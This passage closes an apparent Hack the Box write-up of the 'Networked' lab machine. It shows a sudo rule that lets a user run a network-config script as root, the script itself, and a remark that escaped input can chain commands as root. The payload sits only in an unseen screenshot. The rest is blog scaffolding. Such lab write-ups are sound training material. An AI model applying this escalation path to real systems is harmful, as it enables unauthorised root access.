    <span class="o">!</span>visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, <span class="nv">env_keep</span><span class="o">=</span><span class="s2">"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS"</span>, env_keep+<span class="o">=</span><span class="s2">"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE"</span>, env_keep+<span class="o">=</span><span class="s2">"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES"</span>, env_keep+<span class="o">=</span><span class="s2">"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE"</span>, env_keep+<span class="o">=</span><span class="s2">"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"</span>, <span class="nv">secure_path</span><span class="o">=</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin

User guly may run the following commands on networked:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/sbin/changename.sh</code></pre></figure>

<p>And taking a look at the <code>changename.sh</code> script:</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell"><span class="nb">cat</span> /usr/local/sbin/changename.sh
<span class="c">#!/bin/bash -p</span>
<span class="nb">cat</span> <span class="o">&gt;</span> /etc/sysconfig/network-scripts/ifcfg-guly <span class="o">&lt;&lt;</span> <span class="no">EoF</span><span class="sh">
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
</span><span class="no">EoF

</span><span class="nv">regexp</span><span class="o">=</span><span class="s2">"^[a-zA-Z0-9_</span><span class="se">\ </span><span class="s2">/-]+$"</span>

<span class="k">for </span>var <span class="k">in </span>NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO<span class="p">;</span> <span class="k">do
	</span><span class="nb">echo</span> <span class="s2">"interface </span><span class="nv">$var</span><span class="s2">:"</span>
	<span class="nb">read </span>x
	<span class="k">while</span> <span class="o">[[</span> <span class="o">!</span> <span class="nv">$x</span> <span class="o">=</span>~ <span class="nv">$regexp</span> <span class="o">]]</span><span class="p">;</span> <span class="k">do
		</span><span class="nb">echo</span> <span class="s2">"wrong input, try again"</span>
		<span class="nb">echo</span> <span class="s2">"interface </span><span class="nv">$var</span><span class="s2">:"</span>
		<span class="nb">read </span>x
	<span class="k">done
	</span><span class="nb">echo</span> <span class="nv">$var</span><span class="o">=</span><span class="nv">$x</span> <span class="o">&gt;&gt;</span> /etc/sysconfig/network-scripts/ifcfg-guly
<span class="k">done</span>
  
/sbin/ifup guly0</code></pre></figure>

<p>Now giving it a test run let's see what happens.</p>

<figure class="highlight"><pre><code class="language-shell" data-lang="shell"><span class="nb">sudo</span> <span class="nt">-u</span> root /usr/local/sbin/changename.sh
interface NAME:
<span class="nb">test
</span>interface PROXY_METHOD:
<span class="nb">test
</span>interface BROWSER_ONLY:
<span class="nb">test
</span>interface BOOTPROTO:
<span class="nb">test
</span>ERROR     : <span class="o">[</span>/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.</code></pre></figure>

<p>Ok nothing too telling here. So let's go back to the code. Seems to be some general regex to avoid special characters that would allow encapsultation. After a few different tests I realized that <code>\</code> escaped characters were being interpreted well. So let's see if we can chain together some execution as <code>root</code> using the technique.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-networked/root.PNG" />
</p>

<p>And with that Network is in the books! Thanks folks, until next time.</p>

        
      </div>

      <div class="post-tail-wrapper text-muted">

        <!-- categories -->
        
        <div class="post-meta mb-3">
          <i class="far fa-folder-open fa-fw mr-1"></i>
          
            <a href='/categories/hack-the-box/'>hack-the-box</a>
        </div>
        

        <!-- tags -->
        
        <div class="post-tags">
          <i class="fa fa-tags fa-fw mr-1"></i>
          
          <a href="/tags/htb/"
            class="post-tag no-text-decoration" >htb</a>
          
          <a href="/tags/cron/"
            class="post-tag no-text-decoration" >cron</a>
          
          <a href="/tags/sudo/"
            class="post-tag no-text-decoration" >sudo</a>
          
          <a href="/tags/dirb/"
            class="post-tag no-text-decoration" >dirb</a>
          
          </div>
        

        <div class="post-tail-bottom
          d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
          
          <div class="license-wrapper">
            This post is licensed under
            <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a>
            by the author.
          </div>
          

          <!--
 Post sharing snippet

 v2.1
 https://github.com/cotes2020/jekyll-theme-chirpy
 © 2019 Cotes Chung
 Published under the MIT License
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=Hack the Box - Networked - Quantumly Confused&url=https://padraignix.github.io/hack-the-box/2019/11/16/htb-machine-networked/" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=Hack the Box - Networked - Quantumly Confused&u=https://padraignix.github.io/hack-the-box/2019/11/16/htb-machine-networked/" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://telegram.me/share?text=Hack the Box - Networked - Quantumly Confused&url=https://padraignix.github.io/hack-the-box/2019/11/16/htb-machine-networked/" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    
      
        <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://padraignix.github.io/hack-the-box/2019/11/16/htb-machine-networked/" data-toggle="tooltip" data-placement="top"
          title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin">
          <i class="fa-fw fab fa-linkedin"></i>
        </a>
    

    <i class="fa-fw fas fa-link small" onclick="copyLink()"
        data-toggle="tooltip" data-placement="top" title="Copy link"></i>

  </span>
</div>


        </div><!-- .post-tail-bottom -->

      </div><!-- div.post-tail -->

    </div> <!-- .post -->


  </div> <!-- #post-wrapper -->

  <!--
  The Pannel on right side (Desktop views)
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

  <div class="access">

  <!---->

    <!--












-->

    <!---->

    <div id="access-lastmod" class="post">
      <span>Recent Articles</span>
      <ul class="post-content pl-0 pb-1 ml-1 mt-2">

      
          <li>
            <a href="/quantum-computing/2022/05/29/ibm-quantum-challenge-spring2022/">Qiskit Quantum Challenge - Spring 2022</a>
          </li>
      
          <li>
            <a href="/ctf/2022/05/28/nsec2022-safecracking/">NSEC 2022 - Safe Cracking</a>
          </li>
      
          <li>
            <a href="/ctf/2022/05/22/nsec2022-n64/">NSEC 2022 - N64 - ROM Reverse Engineering</a>
          </li>
      
          <li>
            <a href="/quantum-computing/2022/05/08/qiskit-first-contribution/">Open Source Quantum Computing - First Qiskit Contribution</a>
          </li>
      
          <li>
            <a href="/quantum-computing/2022/04/30/ibm-quantum-challenge-fall2021/">Qiskit Quantum Challenge - Fall 2021</a>
          </li>
      
<!-- Here is where we change logic to not be off of git commits as it's messy and unnecessary 
      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
-->
      </ul>
    </div><!-- #access-lastmod -->

    <!---->

  <!----> <!-- site.data.updates -->

  















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  
    <div id="access-tags">
      <span>Trending Tags</span>
      <div class="d-flex flex-wrap mt-3 mb-1 mr-3">
      
      
        
        <a class="post-tag" href="/tags/htb/">htb</a>
      
        
        <a class="post-tag" href="/tags/ctf/">ctf</a>
      
        
        <a class="post-tag" href="/tags/quantum-computing/">quantum computing</a>
      
        
        <a class="post-tag" href="/tags/qiskit/">qiskit</a>
      
        
        <a class="post-tag" href="/tags/quantum-challenge/">quantum challenge</a>
      
        
        <a class="post-tag" href="/tags/ghidra/">ghidra</a>
      
        
        <a class="post-tag" href="/tags/reverse-engineering/">reverse engineering</a>
      
        
        <a class="post-tag" href="/tags/buffer-overflow/">buffer overflow</a>
      
        
        <a class="post-tag" href="/tags/nsec2021/">nsec2021</a>
      
        
        <a class="post-tag" href="/tags/john-the-ripper/">john the ripper</a>
      

      </div>
    </div>
  
  </div> <!-- .access -->
  
  
  <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
    <span class="pl-3 pt-2 mb-2">Contents</span>
    <nav id="toc" data-toggle="toc"></nav>
  </div>
  

</div> <!-- #panel-wrapper -->


</div> <!-- .row -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.

 v2.0
 https://github.com/cotes2020/jekyll-theme-chirpy
 © 2019 Cotes Chung
 Published under the MIT License
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->






  <div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/hack-the-box/2019/10/12/htb-machine-writeup/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Oct 12, 2019
  

  <i class="unloaded">2019-10-12T11:00:00-04:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Writeup</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Overall a nice simple box from HTB. The machine was relatively easy with an out-of-the-box CMS exploit for user and an interesting login behavior abuse to pivot to root. I'll cover...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/hack-the-box/2019/10/19/htb-machine-ellingson/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Oct 19, 2019
  

  <i class="unloaded">2019-10-19T12:00:00-04:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Ellingson</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Ellingson was a very interesting box personally. Marked as hard by Hackthebox it involved web enumeration and python console abuse for initial foothold, finding sensitive backup fi...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/hack-the-box/2019/10/26/htb-machine-safe/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Oct 26, 2019
  

  <i class="unloaded">2019-10-26T10:00:00-04:00</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the Box - Safe</h3>
            <div class="text-muted small">
              <p>
                





                Introduction




Marked as easy, Safe is a contentious box from HTB requiring a custom developed ROP (return-oriented programming) exploit tied into cracking a KeepPass database. Personally I absol...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->



    <!--
  Navigation buttons at the bottom of the post.

  v2.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/hack-the-box/2019/11/09/htb-machine-jarvis/" class="btn btn-outline-primary">
    <p>Hack the Box - Jarvis</p>
  </a>
  

  
  <a href="/hack-the-box/2019/11/23/htb-machine-chainsaw/" class="btn btn-outline-primary">
    <p>Hack the Box - Chainsaw</p>
  </a>
  

</div>

    

    </div> <!-- #post-extend-wrapper -->

  </div> <!-- .col-* -->

</div> <!-- .row -->

<!-- image lazy load: https://github.com/ApoorvSaxena/lozad.js -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>

<script type="text/javascript">
  const imgs = document.querySelectorAll('#post-wrapper img');
  const observer = lozad(imgs);
  observer.observe();
</script>



        <!--
  The Footer
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center">
    <div class="footer-left">
      <p class="mb-0">
        © 2022
        <a href="https://www.linkedin.com/in/downingpatrick">Patrick Downing</a>.
        
        <span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
        
        <a href="/tabs/disclaimer"> Privacy Policy</a>
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        Powered by
        <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
        with
        <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a>
        theme.
      </p>
    </div>
    <script src="//code.jquery.com/jquery-1.11.0.min.js"></script>
    <script type="text/javascript" src="/assets/js/lightbox.js"></script>
    <link rel="stylesheet" href="/assets/css/lightbox.css">
  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
